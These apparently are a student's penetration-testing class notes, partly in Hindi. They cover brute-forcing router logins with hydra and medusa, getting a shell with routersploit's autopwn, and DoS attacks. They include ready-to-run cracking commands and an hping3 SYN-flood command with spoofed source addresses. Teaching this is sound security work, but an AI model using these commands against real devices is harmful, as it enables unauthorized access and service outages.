Grade 2 Session 2 only

1. Penetration Testing Of Routers
2. -------------------------------
3. Every router has it's own login page. We need to provide username and password to enter the router's interface.
4. route -n ---> gateway address
5. 192.168.0.1
6. username
7. password
8. username ---> admin/Admin
9. default ---> 50%
10.  
11. hydra
12. medusa
13. They both are brute forcing tools which can be used to crack the authentication forms. They bypass or crack the protocls such as ftp, ssh, telnet, http, https. Hydra is comparitively slow. Medusa, it is fast and provides various protocols to work with.
14.  
15.  
16. hydra -s 80 -l admin -P /usr/share/wordlists/rockyou.txt 192.168.0.1 http-get
17.  
18.  
19.  
20. medusa -h 192.168.0.1 -U /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt -e ns -t 1 -v 5 -f -M http
21.  
22.  
23.  
24. routersploit --> it is a router exploiting framework. which uses already existing router exploits and perform them accordingly.
25.  
26. https://github.com/reverse-shell/routersploit
27. >./rsf.py
28. >use scanners/autopwn
29. >set target 192.168.0.1
30. >run
31. -------
32. got an exploit
33. -------
34. >use exploit/<path>
35. > show options
36. > set target 192.168.0.1
37. > run
38. shell access
39.  
40.  
41. DoS --> Denial Of Service ---> A large amount of data or traffic is being send to the web server from one device only. It results in crashing of web services, server down, loss of company.
42. They will monitor the IP Address.... If the traffic from that IP Address is un-necessary and huge in amount as compare to regular traffic..... Blacklist that IP Address
43.  
44. DDoS ---> Distributed Denial of Service ---> It is distributed dos attack.... The traffic here will be send by multiple IP Address but to a single web server.
45.  
46. hping3
47. hping3 is a network tool able to send custom TCP/IP packets and to dis‐
48. play target replies like ping program does with ICMP replies. hping3
49. handle fragmentation, arbitrary packets body and size and can be used
50. in order to transfer files encapsulated under supported protocols.
51. Using hping3 you are able to perform at least the following stuff:
52.  
53. - Test firewall rules
54. - Advanced port scanning
55. - Test net performance using different protocols,
56. packet size, TOS (type of service) and fragmentation.
57. - Path MTU discovery
58. - Transferring files between even really fascist firewall
59. rules.
60. - Traceroute-like under different protocols.
61. - Firewalk-like usage.
62. - Remote OS fingerprinting.
63. - TCP/IP stack auditing.
64. - A lot of others.
65.  
66.  
67. It's also a good didactic tool to learn TCP/IP. hping3 is developed
68. and maintained by antirez@invece.org and is licensed under GPL version
69. 2. Development is open so you can send me patches, suggestion and
70. affronts without inhibitions.
71.  
72.  
73. hping3 -c 10000 -d 120 -S -w 64 -p 21 --flood --rand-source 172.16.79.141
74.  
75. -c ---> count ---> number of packets to be send
76. -d ---> size of each packet
77. -p ---> port number
78. --flood ---> stop nahi krna----> start flooding the service
79. --rand-source ---> jaha se aaya hai... uska address kuch bhi bta do